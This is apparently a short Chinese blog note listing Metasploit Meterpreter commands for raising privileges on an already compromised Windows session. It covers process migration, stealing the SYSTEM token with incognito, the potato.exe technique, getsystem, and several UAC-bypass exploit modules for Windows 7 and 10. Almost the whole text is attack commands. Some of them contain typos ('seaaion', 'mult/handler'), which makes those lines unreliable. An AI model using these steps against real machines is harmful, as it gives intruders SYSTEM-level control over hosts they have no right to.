【笔记】MSF为已建立的Windows会话提权

发表于 更新于 阅读次数:

前言

MSF为已建立的Windows会话提权

利用进程注入提权

  • 查看所有进程,找到可以用于提权的进程
1
meterpreter > ps
  • 进程迁移

<pid>:从上一步骤获取的被注入的进程的pid

1
meterpreter > migrate <pid>

利用令牌窃取提权

  • 使用模块
1
meterpreter > use incognito
  • 查看可以被窃取的令牌
1
meterpreter > list_tokens -u
  • 窃取令牌
1
meterpreter > impersonate_token "AUTHORITY\SYSTEM"

如果无法成功窃取令牌

  • 可以配合potato.exe进行提权
1
2
3
meterpreter > execute -cH -f .\potato.exe
meterpreter > use incognito
meterpreter > impersonate_token "AUTHORITY\SYSTEM"

自动提权

1
meterpreter > getsystem

绕过UAC

bypassuac

  • 针对于Windows7及以前
1
2
3
4
msf exploit(mult/handler) > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set seaaion <id>
msf exploit(windows/local/bypassuac) > run
meterpreter > getsystem

bypassuac_sluihijack

  • 针对于Windows10
1
2
3
4
msf exploit(mult/handler) > use exploit/windows/local/bypassuac_sluihijack
msf exploit(windows/local/bypassuac) > set seaaion <id>
msf exploit(windows/local/bypassuac) > run
meterpreter > getsystem

bypassuac_silentcleanup

1
2
3
4
msf exploit(mult/handler) > use exploit/windows/local/bypassuac_silentcleanup
msf exploit(windows/local/bypassuac) > set seaaion <id>
msf exploit(windows/local/bypassuac) > run
meterpreter > getsystem

ask

  • 通杀
1
2
3
msf exploit(mult/handler) > use exploit/windows/local/ask
msf exploit(windows/local/ask) > set seaaion <id>
msf exploit(windows/local/ask) > run
  • 此时会弹窗用户账户控制,需要点击才能提权
1
meterpreter > getsystem

完成